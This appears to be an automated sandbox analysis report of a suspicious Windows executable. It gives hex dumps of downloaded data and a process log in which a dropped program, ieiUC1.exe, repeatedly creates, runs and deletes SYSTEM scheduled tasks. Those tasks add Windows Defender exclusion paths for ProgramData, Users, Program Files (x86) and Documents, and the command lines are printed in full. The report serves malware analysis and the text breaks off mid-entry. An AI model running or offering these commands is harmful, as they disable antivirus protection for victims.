                                                                        Data Ascii: =9r7U]y9wLp32b"=no)QTo@P;r#~AQQJbo4zseoZTzl'/-Mpg6b[aI/_t"4+Y#:%1?VOy1K3!eiaeUJ:5)3bbEGTn
                                                                        2025-01-14 04:18:14 UTC4096INData Raw: e5 27 0d 1f aa a3 e3 89 21 a6 60 66 31 de d6 98 71 23 a4 ec ea 23 91 a6 6b 18 b0 58 c2 da b7 ee 8e 04 f0 f5 7b 9a 61 5d 6d 10 f8 2c ce da ca c1 f9 08 3e 96 13 11 80 ab a3 91 47 09 43 06 2f 1d af 05 cf b2 d5 cd 18 64 42 7f 29 7e 4a b9 1b 66 00 25 35 7f b1 36 0e 74 3c a2 66 60 d3 90 aa db 49 2e c1 f8 a3 b9 47 21 0a f6 31 0a 55 de a5 3f d8 b3 9f 1d b9 94 81 ce 24 91 25 9b 30 1f b7 b8 3d 56 86 08 7d 82 8b 4b 27 f7 21 4e 96 5a 5b 76 95 4d 7b f1 e5 97 cb 81 57 6f e4 c5 2e 85 a6 35 2a 3c a8 2f 77 e4 e3 e4 70 98 4b ee 2c 80 53 16 3c aa 64 26 f6 96 8a 1d ae 30 42 e0 da 26 3a 22 c9 58 e7 a0 f7 d8 6f 63 77 c2 41 91 07 5a 96 d3 e3 e9 35 c8 f0 a9 23 40 e4 54 d7 b1 25 ba e3 dd 00 bc bd d7 6c 38 dc 99 af e3 08 78 79 f5 13 10 b0 26 54 ab 58 dc e3 eb 98 09 c5 4e ec a6 4f
                                                                        Data Ascii: '!`f1q##kX{a]m,>GC/dB)~Jf%56t<f`I.G!1U?$%0=V}K'!NZ[vM{Wo.5*</wpK,S<d&0B&:"XocwAZ5#@T%l8xy&TXNO
                                                                        2025-01-14 04:18:14 UTC4096INData Raw: df af c1 ef ee 65 82 72 bf b0 ec e9 a3 52 27 ee 5f 95 21 ca 46 80 1a 11 a1 d2 58 95 6d 5b d4 1e f3 d4 8e b3 72 c2 bb b1 50 c4 9f f6 38 5a 23 33 e8 70 c8 d0 f1 cc 88 4c cc 1e 9b af d9 54 06 52 e6 bb 10 71 6b bc 4d 8b 7d ea d5 82 86 f7 c2 fd 45 c8 5a b3 be 8a 7a 7c 7b fe 1a 89 df df e5 8f 29 d4 e0 52 77 f2 cb 16 c7 d9 15 6a 08 3b dd bc 8f ad 4e 7f f1 23 fb 74 9a af 32 2f 7e c5 21 ee a6 c8 b6 e2 82 80 2c ce 01 15 32 0a 7b 04 ae 07 21 3f f4 d2 80 8f 79 50 5b 74 10 f1 4d ec 01 3d 1c a9 9a 0a a6 4c 2f 26 1a 12 d4 8d f7 2f 30 a1 12 7c a1 87 89 74 c4 c6 8f de c3 50 38 c6 de a7 87 94 e5 1c 34 98 fb 11 75 1b 3d cc 1d ad d2 b9 76 0a 21 cb 3e 97 65 b8 43 10 31 cc eb 45 38 55 cc 36 af f2 15 79 ac 9a 98 fe 0a 00 66 df 52 28 fb 69 a4 74 d9 2d 34 49 9b 86 24 c2 c9 34 e0
                                                                        Data Ascii: erR'_!FXm[rP8Z#3pLTRqkM}EZz|{)Rwj;N#t2/~!,2{!?yP[tM=L/&/0|tP84u=v!>eC1E8U6yfR(it-4I$4
                                                                        2025-01-14 04:18:14 UTC4096INData Raw: 1b 1b 6c 89 f7 86 63 6f 3b 4d 6c c3 eb 35 b2 87 b7 5b ad 13 aa 23 81 2d 29 ac 57 53 8b ac 40 d9 b2 60 99 6c 76 1c f3 5c a8 66 d2 2f 45 0d 76 42 64 03 2c e6 64 b6 7c 2f 5d 97 59 ac 4c dd 27 d8 86 53 e5 e2 fe a9 5d 60 0a b6 45 17 ed c4 5d 7d 44 b0 43 c1 08 f8 c0 c0 6a 8a 93 3e fa 01 48 d9 86 e2 ba f2 97 d1 65 bd ff c2 a1 34 86 e3 d0 e0 88 8a a8 5f 7d 9a 59 e8 c3 62 aa 81 54 cd 52 78 af 1c 8f 5f 56 54 33 a9 5c 8a 44 b4 33 80 4b 9f d0 00 7d b5 0b 56 b1 1b ac 7a fa e6 99 09 bb 08 f7 3f 75 7c 6b 68 b3 59 7e 44 b9 ef b3 3e 6f 4a f3 b4 96 f9 63 dd 26 f0 d5 a0 94 87 be 9f 6f 6f 93 2a 20 ea e3 66 0e 81 bd d7 7a 97 b6 23 93 27 dd ca 87 20 e4 58 15 e2 dd 3d 8b 68 bf 7b af 6b 7f 70 ce 50 7b 4d 41 4b b5 6d 7a 38 cc bd 15 7a 1d 6f 1d 61 db c7 72 41 ce 3d 7d f1 f3 41 8e
                                                                        Data Ascii: lco;Ml5[#-)WS@`lv\f/EvBd,d|/]YL'S]`E]}DCj>He4_}YbTRx_VT3\D3K}Vz?u|khY~D>oJc&oo* fz#' X=h{kpP{MAKmz8zoarA=}A
                                                                        2025-01-14 04:18:14 UTC4096INData Raw: 8c c4 b5 82 6b 09 df bb c1 2c 30 df 82 50 39 d1 9d 95 9f d0 0f b5 e7 49 8c 36 18 0d 93 39 05 b9 d0 e4 af 62 cc ab 5f 7e ac d9 90 f7 f0 3d 8f 84 7c 94 3e bb 7e 7a 0b b9 fd fc ba 2f fb 04 bf 92 34 1c 2f b4 81 41 c0 a4 83 9b 0c 32 39 09 fb b1 09 c3 4c 6c 06 a1 97 52 e5 e3 10 c7 9f f6 96 74 f3 45 8f e6 64 17 d4 02 66 91 91 3f 83 38 49 c2 6c a8 60 3d b3 2c 5f 28 7b 9e 91 f2 97 d2 dd ea 6e 00 0f df 18 33 00 5b 64 31 0e 9d 54 df 1f 0e f7 e0 ce df 73 d8 2e 4f 2f aa 74 58 72 01 ee 72 c7 72 9f 28 94 eb 80 b3 9f b0 e0 4e 54 73 dd e9 a5 80 dc e1 9b 30 d1 49 d1 17 53 df e3 9c b2 fb 19 88 d9 56 9b 5f 0b 37 4d 7b 54 fb e9 17 db e4 c6 34 a1 7e bf a3 bd c9 71 4e 6f eb ee e8 a6 4d 90 c0 91 73 49 e5 75 d3 fb dc 7e ba 13 44 e1 d8 cf e5 a5 1d 9d 70 85 42 e6 0a 80 70 2d b8 7d
                                                                        Data Ascii: k,0P9I69b_~=|>~z/4/A29LlRtEdf?8Il`=,_({n3[d1Ts.O/tXrrr(NTs0ISV_7M{T4~qNoMsIu~DpBp-}
                                                                        2025-01-14 04:18:14 UTC4096INData Raw: 80 c4 c8 c5 dd 50 ba e4 94 f1 a8 a7 ae 54 6f ff 14 96 ec c2 33 db da 21 9e c8 93 12 85 10 2c df e2 b3 92 cc e6 d4 27 0c ee 1d 3e ff 5c 2d 7f 29 dd ba 3e 5d de 45 b4 31 e2 bb fd 58 02 1d 6c 60 54 ae 52 bd 8b 10 df 0f f3 f6 31 08 d3 8b b2 a4 bb 70 a9 72 35 3b 68 db d1 50 d0 03 79 6a 00 67 57 7b 75 e6 e3 d5 40 fc d2 53 d2 57 3d c9 33 e3 db 54 37 56 87 25 cf fa 60 d0 97 89 3e 53 30 f9 f1 a0 b0 73 28 81 42 c2 91 64 2e ac b8 08 32 33 30 ff 4b 86 25 74 c1 71 82 c8 49 7a 35 09 0f 05 01 2f 40 a2 9a 28 a2 1c aa 3a 99 37 15 7b 2b 1d 8f 7c 82 99 a0 3a 40 ed 62 78 ab af f6 33 63 3e 03 87 00 ea e8 ee f8 16 76 61 d3 46 07 6d f3 f4 4b c6 df ff f5 95 7a e3 92 04 c6 15 b7 79 f8 c2 d7 94 d4 8b f3 7c 3d c3 d2 56 01 2f 1e 0b da b2 5e 8f cc 6e 28 56 e9 17 25 ba 80 b5 36 59 4d
                                                                        Data Ascii: PTo3!,'>\-)>]E1Xl`TR1pr5;hPyjgW{u@SW=3T7V%`>S0s(Bd.230K%tqIz5/@(:7{+|:@bx3c>vaFmKzy|=V/^n(V%6YM
                                                                        2025-01-14 04:18:14 UTC4096INData Raw: 05 7f 4b 52 2f 62 fa 20 83 8b fb 64 20 05 27 ab 09 b1 77 bf 16 24 c2 62 f5 0c bc 5a 53 23 36 05 dd 55 d4 80 3f 65 96 11 fd 76 aa ec d6 93 bc f0 97 62 21 6a d7 b0 c4 c4 cc e5 ff bc 0f 6f d3 02 99 31 6b 63 af 13 74 ff c9 48 61 1a 38 08 80 d5 a9 0e 2e 61 67 56 37 63 b4 e8 e6 f4 ca 9b 66 bc f7 96 23 79 3b 9e e8 f2 12 79 5f 0c 70 c3 65 c3 d1 22 10 7d 90 dc 8b e9 6d 17 86 38 85 07 7e c1 dd 44 1c bd 4b ef b6 2e e6 1a 8e 77 74 6f f2 80 a7 d7 0e 5a 54 a6 18 a5 be df 6b 42 45 7e 3e 6f ce 8b 02 f8 54 ba 74 31 da 5a d4 7a ee 1a ff 50 2c 0f e8 e7 ad b9 38 3f 45 9e 5e 59 b2 94 b7 cf d8 43 8c fb 45 71 c5 e3 86 75 e6 73 2d 68 92 10 52 3d f1 aa b6 7f c3 72 9e c8 04 e1 66 ef 95 5f a8 17 50 5b 56 2a 4a dd 43 cd 5b 91 97 27 97 49 c9 34 0c ea a6 a1 65 97 60 4c 39 5f ac 4b 18
                                                                        Data Ascii: KR/b d 'w$bZS#6U?evb!jo1kctHa8.agV7cf#y;y_pe"}m8~DK.wtoZTkBE~>oTt1ZzP,8?E^YCEqus-hR=rf_P[V*JC['I4e`L9_K
                                                                        2025-01-14 04:18:14 UTC4096INData Raw: b8 92 27 e4 10 6e f5 e7 99 91 71 c9 b2 ca 43 b0 64 6d 0a 65 04 68 e4 ac 07 70 05 f4 3e 0b 5e c0 35 6f 56 6c 30 2b 26 72 7c 9a 7c 1b a8 c4 6a 33 87 ab c0 e3 34 00 a7 40 36 2f 1d ac 7f dc 86 60 f2 ce 1e 74 e0 56 2d d6 b4 88 45 65 f4 0a 6e 72 f9 73 7a 9a 6d b8 1e 63 89 56 9b f6 0e 32 61 55 85 d5 26 7c e9 17 b9 2d 77 d7 6f 8d bb 4d 11 be 01 f6 d6 2b 78 ab 42 5d 14 91 ea e0 5f bd 9b 2d 33 de bd 92 a0 38 4d 25 3f 84 6d 78 3c d9 1b 1a 9b c3 24 a3 a6 2d 83 e6 9b 25 ee 2a 40 50 c3 5c 2b f9 1d 2e f6 a8 d3 f8 41 7a f4 c0 26 de 1e 98 00 6f 78 4d e2 7e c8 3a 5a cb 5c 34 40 b3 9f 3d 6a c3 cb 35 dd 7a 0f d5 8e db 1b 04 bc de 1e 43 aa 85 e1 de f4 c0 c3 a2 ce 9c 09 c4 04 1a 67 74 50 f4 7b 3c b6 89 87 5f 59 d3 3a 47 e9 89 e6 7e 38 90 00 e8 e1 19 5d 8e 65 cb db 3f 3e 25 72
                                                                        Data Ascii: 'nqCdmehp>^5oVl0+&r||j34@6/`tV-EenrszmcV2aU&|-woM+xB]_-38M%?mx<$-%*@P\+.Az&oxM~:Z\4@=j5zCgtP{<_Y:G~8]e?>%r


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:23:10:15
                                                                        Start date:13/01/2025
                                                                        Path:C:\Users\user\Desktop\183643586-388657435.07.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\Desktop\183643586-388657435.07.exe"
                                                                        Imagebase:0x140000000
                                                                        File size:30'948'864 bytes
                                                                        MD5 hash:EDAE96658A4B8891AA1F35BAB79B1179
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:2
                                                                        Start time:23:11:18
                                                                        Start date:13/01/2025
                                                                        Path:C:\Users\user\Documents\ieiUC1.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Users\user\Documents\ieiUC1.exe
                                                                        Imagebase:0x140000000
                                                                        File size:133'136 bytes
                                                                        MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Antivirus matches:
                                                                        • Detection: 0%, ReversingLabs
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:3
                                                                        Start time:23:11:19
                                                                        Start date:13/01/2025
                                                                        Path:C:\Users\user\Documents\ieiUC1.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Users\user\Documents\ieiUC1.exe
                                                                        Imagebase:0x140000000
                                                                        File size:133'136 bytes
                                                                        MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:4
                                                                        Start time:23:12:01
                                                                        Start date:13/01/2025
                                                                        Path:C:\Users\user\Documents\ieiUC1.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Users\user\Documents\ieiUC1.exe
                                                                        Imagebase:0x140000000
                                                                        File size:133'136 bytes
                                                                        MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:5
                                                                        Start time:23:12:11
                                                                        Start date:13/01/2025
                                                                        Path:C:\Windows\System32\cmd.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                                        Imagebase:0x7ff6fb750000
                                                                        File size:289'792 bytes
                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:6
                                                                        Start time:23:12:11
                                                                        Start date:13/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff627590000
                                                                        File size:875'008 bytes
                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:7
                                                                        Start time:23:12:11
                                                                        Start date:13/01/2025
                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                                                        Imagebase:0x7ff6d1940000
                                                                        File size:235'008 bytes
                                                                        MD5 hash:796B784E98008854C27F4B18D287BA30
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:8
                                                                        Start time:23:12:11
                                                                        Start date:13/01/2025
                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:SCHTASKS /Run /TN "Task1"
                                                                        Imagebase:0x7ff621e90000
                                                                        File size:235'008 bytes
                                                                        MD5 hash:796B784E98008854C27F4B18D287BA30
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:9
                                                                        Start time:23:12:11
                                                                        Start date:13/01/2025
                                                                        Path:C:\Windows\System32\cmd.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                                        Imagebase:0x7ff6fb750000
                                                                        File size:289'792 bytes
                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:10
                                                                        Start time:23:12:11
                                                                        Start date:13/01/2025
                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                                        Imagebase:0x7ff6d1940000
                                                                        File size:235'008 bytes
                                                                        MD5 hash:796B784E98008854C27F4B18D287BA30
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:11
                                                                        Start time:23:12:12
                                                                        Start date:13/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff627590000
                                                                        File size:875'008 bytes
                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:12
                                                                        Start time:23:12:12
                                                                        Start date:13/01/2025
                                                                        Path:C:\Windows\System32\reg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                                        Imagebase:0x7ff74c110000
                                                                        File size:77'312 bytes
                                                                        MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:13
                                                                        Start time:23:12:12
                                                                        Start date:13/01/2025
                                                                        Path:C:\Windows\System32\cmd.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                                        Imagebase:0x7ff6fb750000
                                                                        File size:289'792 bytes
                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:14
                                                                        Start time:23:12:12
                                                                        Start date:13/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff627590000
                                                                        File size:875'008 bytes
                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:15
                                                                        Start time:23:12:12
                                                                        Start date:13/01/2025
                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                                                        Imagebase:0x7ff6d1940000
                                                                        File size:235'008 bytes
                                                                        MD5 hash:796B784E98008854C27F4B18D287BA30
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:16
                                                                        Start time:23:12:12
                                                                        Start date:13/01/2025
                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:SCHTASKS /Run /TN "Task1"
                                                                        Imagebase:0x7ff6d1940000
                                                                        File size:235'008 bytes
                                                                        MD5 hash:796B784E98008854C27F4B18D287BA30
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:17
                                                                        Start time:23:12:13
                                                                        Start date:13/01/2025
                                                                        Path:C:\Windows\System32\cmd.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                                        Imagebase:0x7ff6fb750000
                                                                        File size:289'792 bytes
                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:18
                                                                        Start time:23:12:13
                                                                        Start date:13/01/2025
                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                                        Imagebase:0x7ff6d1940000
                                                                        File size:235'008 bytes
                                                                        MD5 hash:796B784E98008854C27F4B18D287BA30
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:19
                                                                        Start time:23:12:13
                                                                        Start date:13/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff627590000
                                                                        File size:875'008 bytes
                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:20
                                                                        Start time:23:12:13
                                                                        Start date:13/01/2025
                                                                        Path:C:\Windows\System32\reg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                                        Imagebase:0x7ff74c110000
                                                                        File size:77'312 bytes
                                                                        MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:21
                                                                        Start time:23:12:13
                                                                        Start date:13/01/2025
                                                                        Path:C:\Windows\System32\cmd.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                                        Imagebase:0x7ff6fb750000
                                                                        File size:289'792 bytes
                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:22
                                                                        Start time:23:12:13
                                                                        Start date:13/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff627590000
                                                                        File size:875'008 bytes
                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:23
                                                                        Start time:23:12:13
                                                                        Start date:13/01/2025
                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                                                                        Imagebase:0x7ff6d1940000
                                                                        File size:235'008 bytes
                                                                        MD5 hash:796B784E98008854C27F4B18D287BA30
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:24
                                                                        Start time:23:12:14
                                                                        Start date:13/01/2025
                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:SCHTASKS /Run /TN "Task1"
                                                                        Imagebase:0x7ff6d1940000
                                                                        File size:235'008 bytes
                                                                        MD5 hash:796B784E98008854C27F4B18D287BA30
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:25
                                                                        Start time:23:12:14
                                                                        Start date:13/01/2025
                                                                        Path:C:\Windows\System32\cmd.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                                        Imagebase:0x7ff6fb750000
                                                                        File size:289'792 bytes
                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:26
                                                                        Start time:23:12:14
                                                                        Start date:13/01/2025
                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                                        Imagebase:0x7ff6d1940000
                                                                        File size:235'008 bytes
                                                                        MD5 hash:796B784E98008854C27F4B18D287BA30
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:27
                                                                        Start time:23:12:14
                                                                        Start date:13/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff627590000
                                                                        File size:875'008 bytes
                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:28
                                                                        Start time:23:12:14
                                                                        Start date:13/01/2025
                                                                        Path:C:\Windows\System32\reg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                                        Imagebase:0x7ff74c110000
                                                                        File size:77'312 bytes
                                                                        MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:29
                                                                        Start time:23:12:14
                                                                        Start date:13/01/2025
                                                                        Path:C:\Windows\System32\cmd.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                                        Imagebase:0x7ff6fb750000
                                                                        File size:289'792 bytes
                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:30
                                                                        Start time:23:12:14
                                                                        Start date:13/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff627590000
                                                                        File size:875'008 bytes
